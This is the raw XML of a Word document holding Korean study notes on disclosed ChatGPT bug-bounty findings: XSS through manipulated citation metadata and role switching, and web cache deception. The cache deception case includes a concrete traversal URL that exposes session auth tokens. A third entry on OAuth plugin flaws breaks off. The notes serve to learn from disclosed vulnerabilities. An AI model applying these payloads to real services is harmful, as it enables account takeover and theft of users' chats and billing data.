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4996" w14:textId="11356AD1" w:rsidR="008F49CD" w:rsidRDefault="00DC4174" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4174">
        <w:t>XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49359EE6" w14:textId="07517676" w:rsidR="00DC4174" w:rsidRDefault="00000000" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00DC4174" w:rsidRPr="005C2233">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://www.imperva.com/blog/xss-marks-the-spot-digging-up-vulnerabilities-in-chatgpt/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2ECA278F" w14:textId="77777777" w:rsidR="00DC4174" w:rsidRDefault="00DC4174" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7647BD68" w14:textId="63209498" w:rsidR="00DC4174" w:rsidRDefault="00385845" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GPTs는 knowledge files와 같이 온다. 이 files는 GPT API를 통해 기능하며, user-upload file과 유사하지만 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gizmo_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>추가되어있다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. GPT가 public으로 set 되었기에 이 knowledges file을 다운로드 할 수 있고, GPT ID와 associated file ID를 알 수 있다 (Broken Function Level Authorization). "/backend-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/conversation" endpoint for starting ChatGPT conversation에서의 request body와 assistant's metadata가 유사하</w:t>
      </w:r>
      <w:r w:rsidR="006242CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>며 assistant's metadata에 직접 upload한 file의 ID를 포함한 citation이 있음을 확인했다</w:t>
      </w:r>
      <w:r w:rsidR="00264DB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E90A12">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ChatGPT와의 대화를 통해 role을 user에서 assistant로 전환하고, input data를 통해 ChatGPT application 측의 citation metadata를 manipulate할 수 있었다(Mass Assignment vulnerability). assistant를 가장하고 custom citation object를 inject한 new request를 </w:t>
      </w:r>
      <w:r w:rsidR="00E90A12" w:rsidRPr="00E90A12">
        <w:t>“/backend-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E90A12" w:rsidRPr="00E90A12">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E90A12" w:rsidRPr="00E90A12">
        <w:t>/conversation” endpoint</w:t>
      </w:r>
      <w:r w:rsidR="00E90A12">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 작성했다.</w:t>
      </w:r>
      <w:r w:rsidR="009D1AD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file ID를 </w:t>
      </w:r>
      <w:r w:rsidR="009D1AD6" w:rsidRPr="009D1AD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009D1AD6" w:rsidRPr="009D1AD6">
        <w:t>file-Cbn7djQD1W20s3h5JM8NfFs8/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D1AD6" w:rsidRPr="009D1AD6">
        <w:t>download?gizmo_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D1AD6" w:rsidRPr="009D1AD6">
        <w:t>=g-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D1AD6" w:rsidRPr="009D1AD6">
        <w:t>ghPiYIKcD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D1AD6" w:rsidRPr="009D1AD6">
        <w:t>#”</w:t>
      </w:r>
      <w:r w:rsidR="009D1AD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 하여 ChatGPT client에서 GPTs API를 강제로 사용하게 했다. 다른 account에서 clicking any citation은 knowledge file를 다운로드하게 했고, XSS를 trigger 했다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059CFA1" w14:textId="28599D31" w:rsidR="009D1AD6" w:rsidRDefault="009D1AD6" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이 vulnerability는 blob creation과 download URL이 바로 열리던 logic을 바꿈으로써 해결했다. 또, 수정 이후에 conservation metadata가 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>connext_connector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">나 metadata, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>download_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 직접 제어할 수 없었다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A1FC7" w14:textId="36E26601" w:rsidR="001C2A41" w:rsidRDefault="009D1AD6" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">또, </w:t>
      </w:r>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">citation metadata object인 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in code)가 em.url로써 직접 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" attribute를 사용하고 있으며, 이는 metadata가 manipulate될 수 있기에 문제였다. "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" attribute는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 바꿀 수 있었지만 tag에는 target = "_blank" attribute도 있어 block되었다. 다만 ctrl+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>좌클릭</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>마우스가운데클릭</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, ctrl + enter 등의 키보드 단축키를 사용하면 exploit될 것이다. Chat GPT의 interface는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF76DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 포함할 수 있기에, </w:t>
      </w:r>
      <w:r w:rsidR="001C2A41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">투명도 0의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C2A41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C2A41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">과 </w:t>
      </w:r>
      <w:r w:rsidR="001C2A41" w:rsidRPr="001C2A41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001C2A41" w:rsidRPr="001C2A41">
        <w:t xml:space="preserve">Hold </w:t>
      </w:r>
      <w:r w:rsidR="001C2A41" w:rsidRPr="001C2A41">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌘</w:t>
      </w:r>
      <w:r w:rsidR="001C2A41" w:rsidRPr="001C2A41">
        <w:t xml:space="preserve"> and click to open me in a new tab”</w:t>
      </w:r>
      <w:r w:rsidR="001C2A41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 text로 사용자가 </w:t>
      </w:r>
      <w:r w:rsidR="001C2A41">
        <w:t>hat.openai.com에서 임의의 자바스크립트를 실행하게</w:t>
      </w:r>
      <w:r w:rsidR="001C2A41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3D469" w14:textId="5CE2BF74" w:rsidR="00FF76DC" w:rsidRDefault="001C2A41" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001C2A41">
        <w:t xml:space="preserve">chat.openai.com 컨텍스트 내에서 HTML 콘텐츠가 포함된 Blob 객체를 생성하고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C2A41">
        <w:t>URL.createObjectURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C2A41">
        <w:t xml:space="preserve"> 메서드를 사용하여 URL을 생성하여 부모 창을 이 Blob URL로 탐색함으로써 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C2A41">
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C2A41">
        <w:t xml:space="preserve"> 쿠키 제한 및 스토리지 분할을 우회할 수 있었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49429193" w14:textId="77777777" w:rsidR="001C2A41" w:rsidRDefault="001C2A41" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008985E6" w14:textId="6D9F273B" w:rsidR="001C2A41" w:rsidRPr="001C2A41" w:rsidRDefault="001C2A41" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">citation link를 렌더링할 때 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method가 추가되어 https, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mailto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프로토콜만 사용할 수 있도록 검증되게 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고쳐짐</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2896B280" w14:textId="3D9CFE1C" w:rsidR="007A5CE0" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="001C2A41" w:rsidRPr="001C2A41">
        <w:t>ChatGPT Account Takeover - Wildcard Web Cache Deception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CF27B" w14:textId="79926CC1" w:rsidR="001C2A41" w:rsidRDefault="00000000" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="001C2A41" w:rsidRPr="005C2233">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F855274" w14:textId="77777777" w:rsidR="001C2A41" w:rsidRDefault="001C2A41" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054831CA" w14:textId="4B4CB2B3" w:rsidR="001C2A41" w:rsidRDefault="00B240DA" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공유된 채팅이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>캐시되고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 캐시 항목이 만료될 때까지 업데이트되지 않는다. </w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve"> 확장이 아닌 URL 경로의 위치에 의존하는 캐시 규칙이 있을 가능성이 높</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으며,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B240DA">
        <w:t xml:space="preserve"> /share/* 경로 하의 거의 모든 것이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B240DA">
        <w:t>캐시된다는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B240DA">
        <w:t xml:space="preserve"> 것을 의미합니다</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve">Cloudflare의 CDN은 URL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>인코딩된</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve"> 경로 탐색을 디코딩하거나 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>정규화하지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve"> 않았지만, 웹 서버는 이를 디코딩하고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>정규화했습니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00AD2DD0" w:rsidRPr="008B4612">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 CDN에서 </w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>%2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>F..%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve">2F를 디코딩하거나 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>정규화하지</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve"> 않으므로, 응답이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>캐</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시된다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. 하지만 </w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>CDN이 이 URL을 전달할 때, 웹 서버는 %2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>F..%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve">2F를 디코딩하고 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>정규화하여</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t>/auth/session으로 응답</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하고</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0" w:rsidRPr="00AD2DD0">
        <w:t xml:space="preserve"> 인증 토큰이 포함</w:t>
      </w:r>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">된다. 피해자의 인증 토큰이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>캐시되고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, 공격자가 동일 URL에 접근하면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>캐시된</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD2DD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인증 토큰을 볼 수 있고, 계정을 탈취하고 채팅, 청구 정보 등을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093DCFD" w14:textId="237B29B6" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E75CFF" wp14:editId="724E9F58">
            <wp:extent cx="5702023" cy="2960038"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10154609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78" cy="2975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2B4BD" w14:textId="77777777" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5393F2E3" w14:textId="77777777" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584D79D7" w14:textId="77777777" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7B1E56" w14:textId="77777777" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F52A8CC" w14:textId="77777777" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F1C9FE" w14:textId="77777777" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F0B75C" w14:textId="3F93EB10" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="004A5EF9">
        <w:t xml:space="preserve">Security Flaws within ChatGPT Ecosystem Allowed Access to Accounts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A5EF9">
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A5EF9">
        <w:t xml:space="preserve"> Third-Party Websites and Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29446BFA" w14:textId="0313B9D7" w:rsidR="004A5EF9" w:rsidRDefault="004A5EF9" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="008B4612">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-data</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="630EA9D9" w14:textId="1A16A710" w:rsidR="0001208A" w:rsidRDefault="0001208A" w:rsidP="004A5EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BAFD62" w14:textId="77777777" w:rsidR="0001208A" w:rsidRDefault="004A5EF9" w:rsidP="0001208A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Outh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인증</w:t>
      </w:r>
      <w:r w:rsidR="0001208A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 있어 attacker가 victim에게 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7131A" w14:textId="77777777" w:rsidR="00B34C74" w:rsidRDefault="0001208A" w:rsidP="0001208A">
      <w:pPr>
